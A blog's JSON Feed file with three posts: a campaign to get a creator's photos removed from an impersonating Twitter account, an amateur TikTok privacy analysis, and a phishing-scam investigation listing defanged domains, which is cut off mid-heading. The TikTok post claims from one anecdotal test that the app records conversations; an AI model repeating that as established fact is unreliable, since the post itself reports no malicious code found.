-
Notifications
You must be signed in to change notification settings - Fork 0
/
feed.json
160 lines (160 loc) · 140 KB
/
feed.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
{
"version": "https://jsonfeed.org/version/1",
"title": "Sync_Pundit's Blog👽😎🔱🔥",
"description": "",
"home_page_url": "https://blog.syncpundit.io",
"feed_url": "https://blog.syncpundit.io/feed.json",
"user_comment": "",
"author": {
"name": "Sync_Pundit"
},
"items": [
{
"id": "https://blog.syncpundit.io/mission-bianca-coster-vindication/",
"url": "https://blog.syncpundit.io/mission-bianca-coster-vindication/",
"title": "Mission: Bianca Coster Vindication",
"summary": "Bianca Coster, a Digital Creator, is known to most of us as the face of ChrisExcel. I first encountered ChrisExcel sometime during the…",
"content_html": "<p><span style=\"font-weight: 400;\"><a href=\"https://www.instagram.com/bianca_coster/\" target=\"_blank\" rel=\"noopener noreferrer\">Bianca Coster</a>, a Digital Creator, is known to most of us as the face of ChrisExcel. I first encountered ChrisExcel sometime during the height of COVID. Seeing his profile picture, I honestly thought that it was a stock photo .. until this morning. </span></p>\n<p><span style=\"font-weight: 400;\">A friend talked about a podcast episode from <span style=\"color: #3598db;\"><a href=\"https://piped.syncpundit.io/watch?v=9r3pvW5K79w\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Penuel The Black Pen</a></span> where <span style=\"color: #3598db;\"><a href=\"https://www.instagram.com/bianca_coster/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Bianca Coster</a></span> was interviewed and talked about how ChrisExcel has ruined her life by using her photo as his brand. I looked into her and it seems she has asked for ChrisExcel to stop using her photo but he retains it to this day. </span></p>\n<p><span style=\"font-weight: 400;\">I have since made it my mission to get <span style=\"color: #3598db;\"><a href=\"https://www.instagram.com/bianca_coster/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Bianca Coster</a></span>’s photos off of ChrisExcel’s account for three reasons:</span></p>\n<ol>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">To get some vindication for <span style=\"color: #3598db;\"><a href=\"https://www.instagram.com/bianca_coster/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Bianca Coster</a></span></span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">To test if Twitter has a bias when dealing with high-value individuals breaking their ToS</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">To refine my process for Twitter Takedowns</span></li>\n</ol>\n<p><span style=\"font-weight: 400;\">The only social media account I know for sure belongs to her is<span style=\"color: #3598db;\"> </span></span><span style=\"color: #3598db;\"><a href=\"https://www.instagram.com/bianca_coster/channel/\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">@bianca_coster</span></a></span><span style=\"font-weight: 400;\">. But there’s a Twitter account that seems somewhat plausibly hers, </span><span style=\"color: #3598db;\"><a href=\"https://twitter.com/Bianca_Coster\" style=\"color: #3598db;\"><span style=\"font-weight: 400;\">@Bianca_Coster</span></a></span><span style=\"font-weight: 400;\">. Given her following on Instagram and her brand being more built for Instagram, the Twitter account seems somewhat plausible. For the purpose of testing reasons 2 & 3, I’ll be assuming the account is hers. </span></p>\n<p><span style=\"font-weight: 400;\">Since I’ll be going after a Twitter account with a HUGE following, an active user-base and is often in the Trending column, we have to collect as much evidence as humanly possible to prove that <span style=\"color: #3598db;\"><a href=\"https://www.instagram.com/bianca_coster/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Bianca Coster</a></span> is the rightful owner of those images and that they are not being used with her permission, in good faith nor within fair-use. I found a good bunch of accounts in all sorts of places - all of which look and feel plausibly hers. I also got a bunch of product endorsements, modelling portfolios, etc. That should be enough evidence to get started.</span></p>\n<p><span style=\"font-weight: 400;\">Now comes the hard part... Approaching Twitter and convincing them to go ahead with a takedown.</span></p>\n<p><span style=\"color: #000000;\">Let's see how it goes, it's all in Twitter's hands now.</span></p>",
"image": "https://blog.syncpundit.io/media/posts/10/Screenshot-from-2023-04-25-20-59-36.png",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Research"
],
"date_published": "2023-04-25T21:01:13+02:00",
"date_modified": "2023-04-25T21:09:37+02:00"
},
{
"id": "https://blog.syncpundit.io/are-we-safe-from-tiktok/",
"url": "https://blog.syncpundit.io/are-we-safe-from-tiktok/",
"title": "Are we safe from TikTok?",
"summary": "We all know that one doomsday guy who always goes on and on about how \"Social media companies are spying on us and…",
"content_html": "<p>We all know that one doomsday guy who always goes on and on about how \"Social media companies are spying on us and our private collecting data - we should avoid social media like the plague\"</p>\n<p><img loading=\"lazy\" src=\"https://media.tenor.com/NcX_5PkRrhMAAAAC/self-burn-rare.gif\" data-is-external-image=\"true\"></p>\n<p>Well... I am that guy 😅. I was talking to a friend about reducing screen time. My biggest offenders are YouTube and mobile games, hers was TikTok. She shared some funny tiktoks and i noticed that each time she did they all came with a tracking ID tied to her account and a message to join her on TikTok. Now this isn't strange behaviour at all in this new world of ours but there was something peculiar about how they were going about it. It somehow felt imposing... i couldn't explain it but i had a strong urge to download the app as well as a sense of dread at the same time. </p>\n<p>I remembered all the bad press TikTok had been getting these past two years and decided to take a look into it myself before i downloaded the app.</p>\n<h2>The History of Tiktok</h2>\n<p>Remember the good old days of Vine? Back in the early 2010s Vine was just about the closest thing to TikTok. Right around that time a Chinese startup now called ByteDance was formed. Unlike any ordinary startup, the weird thing about ByteDance was how many Chinese government officials were employed there, a mystery which would later be revealed. </p>\n<p>ByteDance's first goal was to create a news app. Instead of the usual news format of reporters and editor creating the news and publishing it, ByteDance was working on a state of the art algorithm to serve as the backbone of their news app.</p>\n<p>Their news app, Headlines, was a genius invention. The algorithm chose and curated the news for each individual user, leaving no need for editors and reporters but perhaps most importantly, serving users exactly what they wanted to consume. The app was a hit! Gaining 10 million users in just 3 months.</p>\n<p>The success of Headlines was soon followed up a few years later by another app, Douyin, the direct ancestor of TikTok. Within just a year it had gained around 100 million users, with over a billion videos viewed per day! With this, the stage was set, ByteDance was ready to go international. </p>\n<p>They named the international version of Douyin \"TikTok\" and launched it. Soon enough people caught wind of it and was fairly successful. But as it got more successful there was another competitor in the space, Musical.ly. Musical.ly was an app that allowed its users to create 15-second to 1-minute lip-syncing music videos and choose sound tracks to accompany them, use different speed options (time-lapse, fast, normal, slow motion, and epic) and add pre-set filters and effects.</p>\n<p>ByteDance saw the potential of Musical.ly and acquired it for a whopping US$900 million. Bytedance consolidated the user accounts of Musical.ly and TikTok, merging the two apps into one under the name TikTok. Former Musical,ly users could still produce videos between 15 seconds and one minute, but could now access a larger number of filters and effects, as well as smoother editing and publishing systems and higher-quality code. And thus TikTok as we know it was born.</p>\n<h2>Investigation</h2>\n<p>Fast forward to today, whenever you're reading this, a lot of governments have banned TilTok either completely or atleast to government officials and their families. I'm very skeptical in nature so this alone isn't enough of a deterrent but when both former US president D.J. Trump and current president J. Biden both agreed that TikTok was a credible threat that caught my attention! Those guys seem to go out of their way to disagree on everything 😂.</p>\n<p>Given the amount of negative press TikTok has been getting i figured they would have went to extreme lengths to obfuscate any nefarious code from their app. With that in mind i went to a third-party app store, looked for the oldest version of TikTok - thanks to <span style=\"color: #3598db;\"><a href=\"https://web.archive.org/\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">The Wayback Machine</a></span> i was able to get my hands on v10.xxx upwards. </p>\n<h4>Heavy Chinese Ties</h4>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-04-16-58-15.png\" alt=\"chinese ip addresses\" width=\"1220\" height=\"962\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-16-58-15-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-16-58-15-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-16-58-15-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-16-58-15-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-16-58-15-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-16-58-15-2xl.png 1600w\"></figure>\n<p>The first thing i found analysing the app were all the IP addresses TikTok was calling to for sending and receiving data. I found:</p>\n<ul>\n<li>Total: <span style=\"color: #e67e23;\">81</span> IP addresses</li>\n<li>Live: <span style=\"color: #e67e23;\">32</span> IP addresses</li>\n<li>Dead: <span style=\"color: #e67e23;\">48</span> IP addresses</li>\n<li>Chinese owned: <span style=\"color: #e67e23;\">58</span> IP addresses </li>\n</ul>\n<p>No one is surprised that TikTok calls to Chinese IP addresses but what was truly mind blowing was just how many there are. <span style=\"color: #e67e23;\">58</span>/<span style=\"color: #e67e23;\">81</span> of the IP addresses were Chinese, this makes it <span style=\"color: #e67e23;\">71.6</span>% of all the IP addresses (of the ones i found anyways). Of those <span style=\"color: #e67e23;\">58</span>, <span style=\"color: #e67e23;\">48</span> belong to Alibaba and <span style=\"color: #e67e23;\">10</span> belong to ByteDance. What worries me about this is the fact that ByteDance basically work with the Chinese government, i wouldn't expect different for Alibaba.</p>\n<h4>Invasive Tracking</h4>\n<p>After tediously going through hundreds of libraries and classes i finally stumbled upon something interesting. A library called AppsFlyer. Check this out:</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-04-18-54-33.png\" alt=\"apps flyer\" width=\"427\" height=\"347\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-18-54-33-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-18-54-33-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-18-54-33-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-18-54-33-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-18-54-33-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-18-54-33-2xl.png 1600w\"></figure>\n<p>WIkipedia says: </p>\n<blockquote>\n<p><strong>AppsFlyer</strong> is a SaaS mobile marketing analytics and attribution platform </p>\n</blockquote>\n<p>So the library basically is for tracking, collecting and attributing data and analytics of the the app's users. Check this out:</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-04-19-28-10.png\" alt=\"collecting EMEI\" width=\"925\" height=\"305\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-28-10-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-28-10-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-28-10-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-28-10-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-28-10-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-28-10-2xl.png 1600w\"></figure>\n<p>They are collecting IMEIs. This is a unique identifier of each particular cell phone. You can think of it as your phone's fingerprint. </p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-04-19-29-58.png\" alt=\"\" width=\"904\" height=\"72\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-29-58-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-29-58-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-29-58-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-29-58-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-29-58-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-19-29-58-2xl.png 1600w\"></figure>\n<p>Check this out as well:</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-04-23-00-50.png\" alt=\"\" width=\"963\" height=\"587\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-23-00-50-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-23-00-50-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-23-00-50-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-23-00-50-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-23-00-50-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-04-23-00-50-2xl.png 1600w\"></figure>They are also collecting location info.</p>\n<p>Just when i though i had seen the worst of it i saw something even scarier....</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-05-21-06-55.png\" alt=\"\" width=\"941\" height=\"237\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-21-06-55-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-21-06-55-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-21-06-55-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-21-06-55-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-21-06-55-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-21-06-55-2xl.png 1600w\"></figure>\n<p>These are some permissions that are REQUIRED for the app to function, as in, MANDATORY!. Let's go over them:</p>\n<ul>\n<li>Camera: Autofocus</li>\n<li>Location: Network, GPS</li>\n<li>Microphone</li>\n<li>Touch Screen</li>\n<li>Screen: Portrait</li>\n<li>Telephony</li>\n<li>Wifi </li>\n</ul>\n<p>Now some of these i can understand. The app couldn't work without the phone's touch screen, portrait mode and mayyyybe WiFi. But why would the camera and autofocus be mandatory right off the bat. I would understand it being an optional requirement when someone wants to create content, same goes for the microphone. Unless one is recording a video from the app it really doesn't need to be constantly on. WHY does the camera and microphone HAVE TO BE <strong>required</strong> regardless of what you're using the app for.</p>\n<p>How about the location, network and gps? Why on Goku's earth would TikTok deem it MANDATORY to know your location, network and gps for you to use the app.</p>\n<p>What about Telephony? What even is that? <span style=\"color: #3598db;\"><a href=\"Provides APIs for monitoring the basic phone information, such as the network type and connection state, plus utilities for manipulating phone number strings.\" style=\"color: #3598db;\">Developers.android.com</a></span> says telephony</p>\n<blockquote>\n<p>Provides APIs for monitoring the basic phone information, such as the network type and connection state, plus utilities for manipulating phone number strings.</p>\n</blockquote>\n<p>Now, what APIs are provided by telephony?</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/Screenshot-from-2023-03-05-22-12-19.png\" alt=\"\" width=\"934\" height=\"752\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-22-12-19-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-22-12-19-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-22-12-19-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-22-12-19-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-22-12-19-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/Screenshot-from-2023-03-05-22-12-19-2xl.png 1600w\"></figure>\n<p>Yuuuup! An app for watching and maybe creating videos made it MANDATORY to use a package that gives them access to APIs that basically can:</p>\n<ul>\n<li>know your cell location</li>\n<li>know your cell info</li>\n<li>know your mobile data activity</li>\n<li>know the precise state of your data connection </li>\n<li>get notified when your network carrier and/or its configuration changes</li>\n<li>know the cause for your disconnected calls</li>\n<li>get indicators of call forwarding</li>\n<li>know the state of your phone calls</li>\n<li>know your network carrier </li>\n<li>know the status of your data activation</li>\n<li>know the state of your data connection</li>\n</ul>\n<p>I haven't found any evidence of malicious behaviour in TikTok's code but it goes without saying that their parent company, ByteDance, has employees from the Chinese government - most of their IP addresses call to Chinese data centres and all Chinese companies are required by law to provide whatever data the government wants. All this on top of the fact that they are COLLECTING all manner of private information from ALL its users.</p>\n<h2>The Experiment</h2>\n<p>So after all these findings i decided to download the app myself and test whether they are actually using the data they are harvesting. For the experiment to work i needed to make the sure i didn't contaminate my account whatsoever. I needed TikTok to use its own algorithm without my input. </p>\n<p>With that in mind i created a blank account with a random username, random birthday and no initial interests. I started watching videos on the for you page and made sure not to open any tiktoks sent to me on the app so tiktok won't attribute my account to anyone else's. To test if they were listening to my conversations i started binge watching specific youtube videos on speaker whenever the Tiktok was running in the background. I spent a whole Saturday watching <span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/@ConnorPrice_\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Connor Price</a></span> and <span style=\"color: #3598db;\"><a href=\"https://www.youtube.com/@Thatsdax\" target=\"_blank\" rel=\"noopener noreferrer\" style=\"color: #3598db;\">Dax</a></span> videos. Sunday morning on my for you page i got this:</p>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/photo_2023-03-02_19-55-46.jpg\" alt=\"\" width=\"278\" height=\"600\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-55-46-xs.jpg 300w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-55-46-sm.jpg 480w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-55-46-md.jpg 768w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-55-46-lg.jpg 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-55-46-xl.jpg 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-55-46-2xl.jpg 1600w\"></figure>\n<figure class=\"post__image post__image--center\"><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/photo_2023-03-02_19-56-37.jpg\" alt=\"\" width=\"277\" height=\"600\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-56-37-xs.jpg 300w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-56-37-sm.jpg 480w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-56-37-md.jpg 768w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-56-37-lg.jpg 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-56-37-xl.jpg 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/photo_2023-03-02_19-56-37-2xl.jpg 1600w\"></figure>\n<p>Now, if this is not evidence enough i don't know what is. </p>\n<h2>Conclusion</h2>\n<p>Clearly TikTok is harvesting all manner of private information about us from our phones: listening to our private conversations, tracking our cell location, tracking our gps, tracks heuristics about our phone calls, etc.</p>\n<p>With the combination of IMEI, network career, cell location and gps TikTok basically knows where exactly you are even after you change your mobile carrier and network. On top of that since you happily give them your name, date of birth, allow the app to go through your contacts to \"find your friends\", all this coupled with the fact that they already have access to your camera along with autofocus and are clearly listening to your conversations - this means that TikTok knows who you are. As in, YOU! THEY KNOW YOU! They know where you stay, where you work, who your friends are, what you talk about with everyone you talk to (EVERYTHING YOU TALK ABOUT with EVERYONE you talk to). </p>\n<p>The question is, why should we care about any of that? Especially since all this information seems to better our experience on the app.</p>\n<p>If you live in a country where the government protects your rights this seems like a valid question. But if, like myself, your native country has gone through its fair share of authoritarian regimes you know the value of privacy and relative anonymity. When your government wants to control every aspect of your life, including what you can and cannot say your home is a haven - there you can be free to criticise the government without fear of disappearing. But with apps like TikTok actively spying on its users, you're never free, ever.</p>\n<p>The problem with living in a free country is the assumption that it will always stay that way. That your leaders will forever remain benevolent. From personal experience i know that they can change in an instant, and when they do, you need to make sure you're not sharpening your enemy's tools for them. For me this means taking control of my privacy and security, and TikTok is a MASSIVE violation of both. I want don't the Chinese, or any government for that matter have access to my entire private life and location at all times. The same goes for any company or cooperation.</p>\n<p>Right now it's the Chinese government doing the spying so it's easy to feel like you're safe. If we let China do this what then stops other governments from doing the same? Africans know better than anyone else that during their fight against colonialism a lot of the countries were sponsored and helped by China. Today most of the industrial and infrastructure development is sponsored by China. Most consumer products are from China as well. I'm sure that the super power that has helped your country since the late 20th century till this day definitely does not influence your government at all, right? African governments are famous for protecting the liberties of their citizens....</p>\n<p>My advice: Delete that app! If you <strong>really</strong> need to use it stick to using the web version on your browser. </p>",
"image": "https://blog.syncpundit.io/media/posts/7/TikTok.jpg",
"author": {
"name": "Sync_Pundit"
},
"tags": [
"Threat Intelligence",
"Research"
],
"date_published": "2023-03-02T19:43:09+02:00",
"date_modified": "2023-03-06T20:57:26+02:00"
},
{
"id": "https://blog.syncpundit.io/romance-scam-network/",
"url": "https://blog.syncpundit.io/romance-scam-network/",
"title": "Romance Scam Network",
"summary": "Back in April someone reported to have lost over $20 000 USD to an elaborate phishing scam. The domain was found to be…",
"content_html": "<p><span style=\"font-weight: 400;\">Back in April someone reported to have lost over $20 000 USD to an elaborate phishing scam. The domain was found to be part of an elaborate network of romance scams. The Modus Operandi of the attack was an attractive woman, appearing to be of Asian descent whose profile was used by the scammers to reach out to high-value individuals (mostly men) on social media platforms like Instagram and Snapchat and dating apps like Tinder. The scammer would then build rapport and gain the victims’ trust by providing them with cryptocurrency trading strategies before driving the victim to a phishing website and swindling them of their fortunes by convincing the user to send money to the scammers’ wallet.</span></p>\n<p><span style=\"font-weight: 400;\">I followed this thread to discover a more complex and widely spread campaign leading to the discovery of additional victims.</span></p>\n<h2><span style=\"font-weight: 400;\">Discovery</span></h2>\n<p><span style=\"font-weight: 400;\">I initially received a report of a user scammed by a MetaTrader 5 broker impersonating LocalCryptos. LocalCryptos is Peer-to-Peer Crypto Marketplace where people buy and sell crypto while MetaTrader is a trading platform that offers financial markets, including Forex, Stocks Exchanges, as well as Futures markets.</span></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7//MetaTrader.png\" alt=\"fake MT5 ticker\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7//responsive/MetaTrader-xs.png 300w ,https://blog.syncpundit.io/media/posts/7//responsive/MetaTrader-sm.png 480w ,https://blog.syncpundit.io/media/posts/7//responsive/MetaTrader-md.png 768w ,https://blog.syncpundit.io/media/posts/7//responsive/MetaTrader-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7//responsive/MetaTrader-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7//responsive/MetaTrader-2xl.png 1600w\"></p>\n<p><span style=\"font-weight: 400;\">Unfortunately, the user had been scammed of $24 460 USD through the website.</span></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7//email.png\" alt=\"email to fake support staff\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7//responsive/email-xs.png 300w ,https://blog.syncpundit.io/media/posts/7//responsive/email-sm.png 480w ,https://blog.syncpundit.io/media/posts/7//responsive/email-md.png 768w ,https://blog.syncpundit.io/media/posts/7//responsive/email-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7//responsive/email-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7//responsive/email-2xl.png 1600w\"></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7//email-2.jpg\" alt=\"fake success registration email \" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7//responsive/email-2-xs.jpg 300w ,https://blog.syncpundit.io/media/posts/7//responsive/email-2-sm.jpg 480w ,https://blog.syncpundit.io/media/posts/7//responsive/email-2-md.jpg 768w ,https://blog.syncpundit.io/media/posts/7//responsive/email-2-lg.jpg 1024w ,https://blog.syncpundit.io/media/posts/7//responsive/email-2-xl.jpg 1360w ,https://blog.syncpundit.io/media/posts/7//responsive/email-2-2xl.jpg 1600w\"></p>\n<p><span style=\"font-weight: 400;\">Tragically, stories like these remain all too common. Sharing educational pieces such as this blog post which look deeper into the details of how these scams operate is part of how we can combat this as an industry. The following section will look further into the technical details of the attack.</span></p>\n<h2><span style=\"font-weight: 400;\">DNS Analysis</span></h2>\n<p><span style=\"font-weight: 400;\">Most of the phishing scams that we see targeting cryptocurrency exchange users are set up in the following way. The scammers purchase a domain and website hosting, set up a phishing kit that they’ve either developed or purchased and mass deliver the attack to the victims, either through social media channels or email. Their DNS setup is normally fairly simple. The phishing domain’s registrar also provides the name servers, at best the website is hidden behind proxies like Cloudflare.</span></p>\n<p><span style=\"font-weight: 400;\">This particular scam setup on the domain Lcryptos [.] com had an interesting DNS setup.</span></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7//dns.png\" alt=\"lcryptos.com dns\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7//responsive/dns-xs.png 300w ,https://blog.syncpundit.io/media/posts/7//responsive/dns-sm.png 480w ,https://blog.syncpundit.io/media/posts/7//responsive/dns-md.png 768w ,https://blog.syncpundit.io/media/posts/7//responsive/dns-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7//responsive/dns-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7//responsive/dns-2xl.png 1600w\"></p>\n<ul>\n<li><span style=\"font-weight: 400;\">They had set up mail exchange servers on chengmail[.]cn</span></li>\n<li><span style=\"font-weight: 400;\">They had set up SPF: TXT lcryptos[.]com v=spf1 include:spf.chengmail.cn ~all </span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">Lcryptos[.]com’s WHOIS records show that it was registered on 1 July 2021. It was hosted in Hong Kong along with a few other domains:</span></p>\n<ul>\n<li><span style=\"font-weight: 400;\">foxconnr[.]com (Likely targeting users of LooksRare)</span></li>\n<li><span style=\"font-weight: 400;\">financialfx[.]com</span></li>\n<li><span style=\"font-weight: 400;\">hkyodacapital[.]com</span></li>\n<li><span style=\"font-weight: 400;\">first-ratio[.]com</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">It had several subdomains:</span></p>\n<ul>\n<li><span style=\"font-weight: 400;\">broker[.]lcryptos[.]com</span></li>\n<li><span style=\"font-weight: 400;\">admin[.]lcryptos[.]com</span></li>\n<li><span style=\"font-weight: 400;\">user[.]lcryptos[.]com</span></li>\n<li><span style=\"font-weight: 400;\">trader[.]lcryptos[.]com</span></li>\n</ul>\n<h2><span style=\"font-weight: 400;\">Deeper Investigation: More Victims</span></h2>\n<p><span style=\"font-weight: 400;\">From gathering OSINT (Open Source Intelligence) I managed to find more victims of the scam and put together LCryptos’ MO.</span></p>\n<p><span style=\"font-weight: 400;\">The earliest victim I found was on 19 July 2021, in the same month the domain was registered, they had been swindled of at least $5 000USD. I went on to find more victims between July and September all with a similar story. The scam seems to have temporarily stopped after September only to resurface in December, presumably using a new hosting provider judging from the default windows server snapshot of the website from The Wayback Machine. The phishing website was probably reported and had its hosting revoked.</span></p>\n<p><img loading=\"lazy\" src=\"https://blog.syncpundit.io/media/posts/7/internet-archive.png\" alt=\"internet archive of lcryptos.com\" sizes=\"(max-width: 48em) 100vw, 768px\" srcset=\"https://blog.syncpundit.io/media/posts/7/responsive/internet-archive-xs.png 300w ,https://blog.syncpundit.io/media/posts/7/responsive/internet-archive-sm.png 480w ,https://blog.syncpundit.io/media/posts/7/responsive/internet-archive-md.png 768w ,https://blog.syncpundit.io/media/posts/7/responsive/internet-archive-lg.png 1024w ,https://blog.syncpundit.io/media/posts/7/responsive/internet-archive-xl.png 1360w ,https://blog.syncpundit.io/media/posts/7/responsive/internet-archive-2xl.png 1600w\"></p>\n<h2><span style=\"font-weight: 400;\">The Modus 